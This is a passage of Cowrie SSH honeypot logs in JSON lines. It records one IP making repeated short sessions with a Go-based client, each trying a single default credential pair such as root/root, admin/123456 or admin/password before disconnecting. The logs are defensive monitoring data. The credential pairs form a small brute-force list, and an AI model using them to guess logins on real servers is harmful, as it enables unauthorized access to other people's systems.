sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:22.567991Z","src_ip":"212.227.125.160","session":"66bfe72a7f2e"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:22.823281Z","src_ip":"212.227.125.160","session":"66bfe72a7f2e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:23.866167Z","src_ip":"212.227.125.160","session":"66bfe72a7f2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59380,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a8ace099bf4","protocol":"ssh","message":"New connection: 212.227.125.160:59380 (1.2.3.4:22) [session: 2a8ace099bf4]","sensor":"my-vps","timestamp":"2025-09-09T02:57:23.907174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:23.912721Z","src_ip":"212.227.125.160","session":"2a8ace099bf4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:23.959337Z","src_ip":"212.227.125.160","session":"2a8ace099bf4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:24.148727Z","src_ip":"212.227.125.160","session":"2a8ace099bf4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:25.219218Z","src_ip":"212.227.125.160","session":"2a8ace099bf4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40008,"dst_ip":"1.2.3.4","dst_port":22,"session":"932b01ad7ccc","protocol":"ssh","message":"New connection: 212.227.125.160:40008 (1.2.3.4:22) [session: 932b01ad7ccc]","sensor":"my-vps","timestamp":"2025-09-09T02:57:25.268488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:25.282981Z","src_ip":"212.227.125.160","session":"932b01ad7ccc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:25.333084Z","src_ip":"212.227.125.160","session":"932b01ad7ccc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:25.484251Z","src_ip":"212.227.125.160","session":"932b01ad7ccc"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:26.553257Z","src_ip":"212.227.125.160","session":"932b01ad7ccc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47668,"dst_ip":"1.2.3.4","dst_port":22,"session":"f786023854ce","protocol":"ssh","message":"New connection: 212.227.125.160:47668 (1.2.3.4:22) [session: f786023854ce]","sensor":"my-vps","timestamp":"2025-09-09T02:57:26.594103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:26.610714Z","src_ip":"212.227.125.160","session":"f786023854ce"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:26.679966Z","src_ip":"212.227.125.160","session":"f786023854ce"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:26.971669Z","src_ip":"212.227.125.160","session":"f786023854ce"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:28.054194Z","src_ip":"212.227.125.160","session":"f786023854ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55272,"dst_ip":"1.2.3.4","dst_port":22,"session":"9070373df41e","protocol":"ssh","message":"New connection: 212.227.125.160:55272 (1.2.3.4:22) [session: 9070373df41e]","sensor":"my-vps","timestamp":"2025-09-09T02:57:28.108104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:28.131244Z","src_ip":"212.227.125.160","session":"9070373df41e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:28.154325Z","src_ip":"212.227.125.160","session":"9070373df41e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:28.333616Z","src_ip":"212.227.125.160","session":"9070373df41e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:29.696826Z","src_ip":"212.227.125.160","session":"9070373df41e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35280,"dst_ip":"1.2.3.4","dst_port":22,"session":"b13f9042a62c","protocol":"ssh","message":"New connection: 212.227.125.160:35280 (1.2.3.4:22) [session: b13f9042a62c]","sensor":"my-vps","timestamp":"2025-09-09T02:57:29.755591Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:30.064878Z","src_ip":"212.227.125.160","session":"b13f9042a62c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:30.065588Z","src_ip":"212.227.125.160","session":"b13f9042a62c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:30.746607Z","src_ip":"212.227.125.160","session":"b13f9042a62c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:31.819538Z","src_ip":"212.227.125.160","session":"b13f9042a62c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45190,"dst_ip":"1.2.3.4","dst_port":22,"session":"641a7a795e5e","protocol":"ssh","message":"New connection: 212.227.125.160:45190 (1.2.3.4:22) [session: 641a7a795e5e]","sensor":"my-vps","timestamp":"2025-09-09T02:57:31.863436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:31.876387Z","src_ip":"212.227.125.160","session":"641a7a795e5e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:31.913446Z","src_ip":"212.227.125.160","session":"641a7a795e5e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:32.108912Z","src_ip":"212.227.125.160","session":"641a7a795e5e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:33.159623Z","src_ip":"212.227.125.160","session":"641a7a795e5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52306,"dst_ip":"1.2.3.4","dst_port":22,"session":"4303e7428f9e","protocol":"ssh","message":"New connection: 212.227.125.160:52306 (1.2.3.4:22) [session: 4303e7428f9e]","sensor":"my-vps","timestamp":"2025-09-09T02:57:33.203107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:33.203935Z","src_ip":"212.227.125.160","session":"4303e7428f9e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:33.247529Z","src_ip":"212.227.125.160","session":"4303e7428f9e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"111111","message":"login attempt [admin/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:33.380329Z","src_ip":"212.227.125.160","session":"4303e7428f9e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:34.527730Z","src_ip":"212.227.125.160","session":"4303e7428f9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60088,"dst_ip":"1.2.3.4","dst_port":22,"session":"c412e47f6cab","protocol":"ssh","message":"New connection: 212.227.125.160:60088 (1.2.3.4:22) [session: c412e47f6cab]","sensor":"my-vps","timestamp":"2025-09-09T02:57:34.582225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:34.636550Z","src_ip":"212.227.125.160","session":"c412e47f6cab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:34.637160Z","src_ip":"212.227.125.160","session":"c412e47f6cab"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password1","message":"login attempt [admin/password1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:35.042377Z","src_ip":"212.227.125.160","session":"c412e47f6cab"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:36.264975Z","src_ip":"212.227.125.160","session":"c412e47f6cab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41682,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b8594f997ff","protocol":"ssh","message":"New connection: 212.227.125.160:41682 (1.2.3.4:22) [session: 7b8594f997ff]","sensor":"my-vps","timestamp":"2025-09-09T02:57:36.323391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:36.582725Z","src_ip":"212.227.125.160","session":"7b8594f997ff"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:36.583395Z","src_ip":"212.227.125.160","session":"7b8594f997ff"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:37.115488Z","src_ip":"212.227.125.160","session":"7b8594f997ff"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:38.394373Z","src_ip":"212.227.125.160","session":"7b8594f997ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51068,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe0089fae09f","protocol":"ssh","message":"New connection: 212.227.125.160:51068 (1.2.3.4:22) [session: fe0089fae09f]","sensor":"my-vps","timestamp":"2025-09-09T02:57:38.497738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:38.661198Z","src_ip":"212.227.125.160","session":"fe0089fae09f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-n